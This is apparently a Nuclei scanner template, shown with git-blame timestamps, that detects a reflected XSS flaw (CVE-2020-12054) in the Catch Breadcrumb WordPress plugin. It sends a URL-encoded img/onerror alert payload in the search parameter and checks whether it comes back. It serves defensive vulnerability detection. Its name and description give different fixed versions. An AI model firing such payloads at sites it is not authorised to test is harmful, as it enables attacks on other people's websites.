2021-07-15 11:27:45 +00:00
|
|
|
id: CVE-2020-12054
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS
|
|
|
|
author: daffainfo
|
|
|
|
severity: medium
|
2021-07-15 11:55:22 +00:00
|
|
|
description: The Catch Breadcrumb plugin before 1.5.4 for WordPress allows Reflected XSS via the s parameter (a search query).
|
2021-07-15 11:27:45 +00:00
|
|
|
reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
|
|
|
|
tags: cve,cve2020,wordpress,xss,wp-plugin
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2021-07-19 18:25:15 +00:00
|
|
|
- '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'
|
2021-07-15 11:27:45 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
2021-07-19 18:25:15 +00:00
|
|
|
- "<img src=x onerror=alert(123);>"
|
2021-07-16 20:37:26 +00:00
|
|
|
- "catch-breadcrumb"
|
2021-07-15 11:27:45 +00:00
|
|
|
part: body
|
2021-07-16 20:37:26 +00:00
|
|
|
condition: and
|
2021-07-15 11:27:45 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
2021-07-19 18:25:15 +00:00
|
|
|
- 200
|